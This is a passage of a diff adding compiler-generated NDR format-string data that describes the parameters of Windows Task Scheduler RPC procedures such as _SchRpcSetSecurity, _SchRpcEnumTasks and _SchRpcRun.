0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 224 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 226 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 228 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 230 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 232 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_2 */ + +/* 234 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 236 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 238 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 240 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 242 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 244 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcSetSecurity */ + + + /* Return value */ + +/* 246 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 248 */ NdrFcLong( 0x0 ), /* 0 */ +/* 252 */ NdrFcShort( 0x4 ), /* 4 */ +/* 254 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 256 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 258 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 260 */ NdrFcShort( 0x8 ), /* 8 */ +/* 262 */ NdrFcShort( 0x8 ), /* 8 */ +/* 264 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 266 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 268 */ NdrFcShort( 0x0 ), /* 0 */ +/* 270 */ NdrFcShort( 0x0 ), /* 0 */ +/* 272 */ NdrFcShort( 0x0 ), /* 0 */ +/* 274 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 276 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 278 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 280 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 282 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 284 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 286 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 288 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 290 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 292 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 294 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 296 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 298 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetSecurity */ + + + /* Return value */ + +/* 300 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 302 */ NdrFcLong( 0x0 ), /* 0 */ +/* 306 */ NdrFcShort( 0x5 ), /* 5 */ +/* 308 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 310 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 312 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 314 */ NdrFcShort( 0x8 ), /* 8 */ +/* 316 */ NdrFcShort( 0x8 ), /* 8 */ +/* 318 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 320 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 322 */ NdrFcShort( 0x0 ), /* 0 */ +/* 324 */ NdrFcShort( 0x0 ), /* 0 */ +/* 326 */ NdrFcShort( 0x0 ), /* 0 */ +/* 328 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 330 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 332 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 334 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 336 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 338 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 340 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 342 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 344 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 346 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_3 */ + +/* 348 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 350 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 352 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnumFolders */ + + + /* Return value */ + +/* 354 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 356 */ NdrFcLong( 0x0 ), /* 0 */ +/* 360 */ NdrFcShort( 0x6 ), /* 6 */ +/* 362 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 364 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 366 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 368 */ NdrFcShort( 0x2c ), /* 44 */ +/* 370 */ NdrFcShort( 0x40 ), /* 64 */ +/* 372 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x7, /* 7 */ +/* 374 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 376 */ NdrFcShort( 0x1 ), /* 1 */ +/* 378 */ NdrFcShort( 0x0 ), /* 0 */ +/* 380 */ NdrFcShort( 0x0 ), /* 0 */ +/* 382 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 384 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 386 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 388 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 390 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 392 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 394 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 396 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ +/* 398 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 400 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 402 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 404 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 406 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 408 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 410 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 412 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 414 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 416 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 418 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ + + /* Parameter arg_6 */ + +/* 420 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 422 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 424 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnumTasks */ + + + /* Return value */ + +/* 426 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 428 */ NdrFcLong( 0x0 ), /* 0 */ +/* 432 */ NdrFcShort( 0x7 ), /* 7 */ +/* 434 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 436 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 438 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 440 */ NdrFcShort( 0x2c ), /* 44 */ +/* 442 */ NdrFcShort( 0x40 ), /* 64 */ +/* 444 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x7, /* 7 */ +/* 446 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 448 */ NdrFcShort( 0x1 ), /* 1 */ +/* 450 */ NdrFcShort( 0x0 ), /* 0 */ +/* 452 */ NdrFcShort( 0x0 ), /* 0 */ +/* 454 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 456 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 458 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 460 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 462 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 464 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 466 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 468 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ +/* 470 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 472 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 474 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 476 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 478 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 480 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 482 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 484 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 486 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 488 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 490 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ + + /* Parameter arg_6 */ + +/* 492 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 494 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 496 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnumInstances */ + + + /* Return value */ + +/* 498 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 500 */ NdrFcLong( 0x0 ), /* 0 */ +/* 504 */ NdrFcShort( 0x8 ), /* 8 */ +/* 506 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 508 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 510 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 512 */ NdrFcShort( 0x8 ), /* 8 */ +/* 514 */ NdrFcShort( 0x24 ), /* 36 */ +/* 516 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x5, /* 5 */ +/* 518 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 520 */ NdrFcShort( 0x1 ), /* 1 */ +/* 522 */ NdrFcShort( 0x0 ), /* 0 */ +/* 524 */ NdrFcShort( 0x0 ), /* 0 */ +/* 526 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 528 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 530 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 532 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_1 */ + +/* 534 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 536 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 538 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 540 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 542 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 544 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 546 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 548 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 550 */ NdrFcShort( 0x82 ), /* Type Offset=130 */ + + /* Parameter arg_4 */ + +/* 552 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 554 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 556 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetInstanceInfo */ + + + /* Return value */ + +/* 558 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 560 */ NdrFcLong( 0x0 ), /* 0 */ +/* 564 */ NdrFcShort( 0x9 ), /* 9 */ +/* 566 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ +/* 568 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 570 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 572 */ NdrFcShort( 0x44 ), /* 68 */ +/* 574 */ NdrFcShort( 0x5c ), /* 92 */ +/* 576 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ + 0x9, /* 9 */ +/* 578 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 580 */ NdrFcShort( 0x1 ), /* 1 */ +/* 582 */ NdrFcShort( 0x0 ), /* 0 */ +/* 584 */ NdrFcShort( 0x0 ), /* 0 */ +/* 586 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 588 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ +/* 590 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 592 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ + + /* Parameter arg_1 */ + +/* 594 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 596 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 598 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_2 */ + +/* 600 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 602 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 604 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 606 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 608 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 610 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_4 */ + +/* 612 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 614 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 616 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_5 */ + +/* 618 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 620 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 622 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_6 */ + +/* 624 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 626 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 628 */ NdrFcShort( 0xb6 ), /* Type Offset=182 */ + + /* Parameter arg_7 */ + +/* 630 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 632 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 634 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_8 */ + +/* 636 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 638 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 640 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcStopInstance */ + + + /* Return value */ + +/* 642 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 644 */ NdrFcLong( 0x0 ), /* 0 */ +/* 648 */ NdrFcShort( 0xa ), /* 10 */ +/* 650 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 652 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 654 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 656 */ NdrFcShort( 0x4c ), /* 76 */ +/* 658 */ NdrFcShort( 0x8 ), /* 8 */ +/* 660 */ 0x44, /* Oi2 Flags: has return, has ext, */ + 0x3, /* 3 */ +/* 662 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 664 */ NdrFcShort( 0x0 ), /* 0 */ +/* 666 */ NdrFcShort( 0x0 ), /* 0 */ +/* 668 */ NdrFcShort( 0x0 ), /* 0 */ +/* 670 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 672 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ +/* 674 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 676 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ + + /* Parameter arg_1 */ + +/* 678 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 680 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 682 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 684 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 686 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 688 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcStop */ + + + /* Return value */ + +/* 690 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 692 */ NdrFcLong( 0x0 ), /* 0 */ +/* 696 */ NdrFcShort( 0xb ), /* 11 */ +/* 698 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 700 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 702 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 704 */ NdrFcShort( 0x8 ), /* 8 */ +/* 706 */ NdrFcShort( 0x8 ), /* 8 */ +/* 708 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 710 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 712 */ NdrFcShort( 0x0 ), /* 0 */ +/* 714 */ NdrFcShort( 0x0 ), /* 0 */ +/* 716 */ NdrFcShort( 0x0 ), /* 0 */ +/* 718 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 720 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 722 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 724 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_1 */ + +/* 726 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 728 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 730 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 732 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 734 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 736 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcRun */ + + + /* Return value */ + +/* 738 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 740 */ NdrFcLong( 0x0 ), /* 0 */ +/* 744 */ NdrFcShort( 0xc ), /* 12 */ +/* 746 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 748 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 750 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 752 */ NdrFcShort( 0x18 ), /* 24 */ +/* 754 */ NdrFcShort( 0x4c ), /* 76 */ +/* 756 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x8, /* 8 */ +/* 758 */ 0xa, /* 10 */ + 0x5, /* Ext Flags: new corr desc, srv corr check, */ +/* 760 */ NdrFcShort( 0x0 ), /* 0 */ +/* 762 */ NdrFcShort( 0x1 ), /* 1 */ +/* 764 */ NdrFcShort( 0x0 ), /* 0 */ +/* 766 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 768 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 770 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 772 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 774 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 776 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 778 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 780 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 782 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 784 */ NdrFcShort( 0xd4 ), /* Type Offset=212 */ + + /* Parameter arg_3 */ + +/* 786 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 788 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 790 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 792 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 794 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 796 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 798 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 800 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 802 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_6 */ + +/* 804 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ +/* 806 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 808 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ + + /* Parameter arg_7 */ + +/* 810 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 812 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 814 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcDelete */ + + + /* Return value */ + +/* 816 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 818 */ NdrFcLong( 0x0 ), /* 0 */ +/* 822 */ NdrFcShort( 0xd ), /* 13 */ +/* 824 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 826 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 828 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 830 */ NdrFcShort( 0x8 ), /* 8 */ +/* 832 */ NdrFcShort( 0x8 ), /* 8 */ +/* 834 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 836 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 838 */ NdrFcShort( 0x0 ), /* 0 */ +/* 840 */ NdrFcShort( 0x0 ), /* 0 */ +/* 842 */ NdrFcShort( 0x0 ), /* 0 */ +/* 844 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 846 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 848 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 850 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 852 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 854 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 856 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 858 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 860 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 862 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcRename */ + + + /* Return value */ + +/* 864 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 866 */ NdrFcLong( 0x0 ), /* 0 */ +/* 870 */ NdrFcShort( 0xe ), /* 14 */ +/* 872 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 874 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 876 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 878 */ NdrFcShort( 0x8 ), /* 8 */ +/* 880 */ NdrFcShort( 0x8 ), /* 8 */ +/* 882 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 884 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 886 */ NdrFcShort( 0x0 ), /* 0 */ +/* 888 */ NdrFcShort( 0x0 ), /* 0 */ +/* 890 */ NdrFcShort( 0x0 ), /* 0 */ +/* 892 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 894 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 896 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 898 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 900 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 902 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 904 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 906 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 908 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 910 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 912 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 914 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 916 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcScheduledRuntimes */ + + + /* Return value */ + +/* 918 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 920 */ NdrFcLong( 0x0 ), /* 0 */ +/* 924 */ NdrFcShort( 0xf ), /* 15 */ +/* 926 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 928 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 930 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 932 */ NdrFcShort( 0x78 ), /* 120 */ +/* 934 */ NdrFcShort( 0x24 ), /* 36 */ +/* 936 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x8, /* 8 */ +/* 938 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 940 */ NdrFcShort( 0x1 ), /* 1 */ +/* 942 */ NdrFcShort( 0x0 ), /* 0 */ +/* 944 */ NdrFcShort( 0x0 ), /* 0 */ +/* 946 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 948 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 950 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 952 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 954 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ +/* 956 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 958 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ + + /* Parameter arg_2 */ + +/* 960 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ +/* 962 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 964 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ + + /* Parameter arg_3 */ + +/* 966 */ NdrFcShort( 0x48 ), /* Flags: in, 